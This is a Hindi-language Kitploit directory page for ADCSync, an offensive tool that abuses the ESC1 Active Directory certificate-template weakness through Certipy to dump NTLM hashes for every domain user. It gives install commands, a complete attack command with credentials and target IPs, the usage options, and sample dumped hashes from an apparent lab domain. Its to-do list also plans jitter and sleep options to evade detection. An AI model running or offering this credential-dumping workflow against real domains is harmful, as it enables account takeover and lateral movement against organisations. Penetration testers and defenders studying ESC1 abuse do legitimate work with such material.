Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ADCSync — ESC1 का उपयोग करके एक अस्थायी DCSync करें और हैश डंप करें | Kitploit
उपकरण/GitHubGitHub/jpg0mez/adcsync
पासवर्ड क्रैकिंगशोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubjpg0mez/adcsync

ADCSync

ESC1 का उपयोग करके एक अस्थायी DCSync करें और हैश डंप करें

रिपॉजिटरी देखें
212242 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ADCSsync

यह एक टूल है जिसे मैंने ESC1 का उपयोग करके DCSync करने के लिए जल्दी से तैयार किया है। यह काफी धीमा है लेकिन DRSUAPI या Volume Shadow Copy का उपयोग किए बिना एक अस्थायी DCSync हमला करने का एक प्रभावी तरीका है।

यह टूल का पहला संस्करण है और मूल रूप से हर उपयोगकर्ता के खिलाफ Certipy चलाने की प्रक्रिया को स्वचालित करता है। इसमें अभी भी बहुत काम की ज़रूरत है और मैं भविष्य में प्रमाणीकरण विधियों के लिए और अधिक सुविधाएँ जोड़ने और कमजोर टेम्पलेट खोजने की प्रक्रिया को स्वचालित करने की योजना बना रहा हूँ।

root@kitploit:~
python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt

    ___    ____  ___________
   /   |  / __ \/ ____/ ___/__  ______  _____
  / /| | / / / / /    \__ \/ / / / __ \/ ___/
 / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/  |_/_____/\____//____/\__, /_/ /_/\___/
                         /____/

Grabbing user certs:
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 105/105 [02:18<00:00,  1.32s/it]
THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::
THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::
THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::
THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::
THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::
THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::
THEGRID.LOCAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::
THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::
THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::

परिचय

ADCSync, Active Directory वातावरण में उपयोगकर्ता खातों से NTLM हैश डंप करने के लिए ESC1 एक्सप्लॉइट का उपयोग करता है। टूल पहले पास किए गए Bloodhound डंप फ़ाइल से हर उपयोगकर्ता और डोमेन प्राप्त करेगा। फिर यह प्रत्येक उपयोगकर्ता के लिए Certipy का उपयोग करके एक अनुरोध करेगा और उनकी PFX फ़ाइल को प्रमाणपत्र निर्देशिका में संग्रहीत करेगा। अंत में, यह प्रमाणपत्र के साथ प्रमाणीकरण करने और प्रत्येक उपयोगकर्ता के लिए NT हैश प्राप्त करने के लिए Certipy का उपयोग करेगा। यह प्रक्रिया काफी धीमी है और इसे पूरा होने में कुछ समय लग सकता है, लेकिन NTLM हैश डंप करने का एक वैकल्पिक तरीका प्रदान करता है।

स्थापना

root@kitploit:~
git clone https://github.com/JPG0mez/adcsync.git
cd adcsync
pip3 install -r requirements.txt

उपयोग

इस टूल का उपयोग करने के लिए हमें निम्नलिखित चीज़ों की आवश्यकता है:

  1. मान्य डोमेन क्रेडेंशियल्स
  2. Bloodhound डंप से एक उपयोगकर्ता सूची जो पास की जाएगी।
  3. ESC1 के लिए कमजोर एक टेम्पलेट (Certipy find के साथ पाया गया)
root@kitploit:~
# python3 adcsync.py --help
    ___    ____  ___________                 
   /   |  / __ \/ ____/ ___/__  ______  _____
  / /| | / / / / /    \__ \/ / / / __ \/ ___/
 / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__  
/_/  |_/_____/\____//____/\__, /_/ /_/\___/  
                         /____/              

Usage: adcsync.py [OPTIONS]

Options:
  -f, --file TEXT      Input User List JSON file from Bloodhound  [required]
  -o, --output TEXT    NTLM Hash Output file  [required]
  -ca TEXT             Certificate Authority  [required]
  -dc-ip TEXT          IP Address of Domain Controller  [required]
  -u, --user TEXT      Username  [required]
  -p, --password TEXT  Password  [required]
  -template TEXT       Template Name vulnerable to ESC1  [required]
  -target-ip TEXT      IP Address of the target machine  [required]
  --help               Show this message and exit.

करने के लिए

  • NTLM हैश और ccache फ़ाइलों जैसे वैकल्पिक प्रमाणीकरण विधियों का समर्थन
  • ESC1 के लिए कमजोर टेम्पलेट खोजने और लाने के लिए स्वचालित रूप से "certipy find" चलाना
  • पहचान से बचने के लिए जिटर और स्लीप विकल्प जोड़ना
  • सभी चरों के लिए प्रकार सत्यापन जोड़ना

आभार

  • puzzlepeaches: मुझे जल्दी से यह लिखने के लिए कहने के लिए
  • ly4k: Certipy के लिए
  • WazeHell: परीक्षण के लिए उपयोग किए गए कमजोर AD वातावरण को स्थापित करने की स्क्रिप्ट के लिए
टूल डाउनलोड करें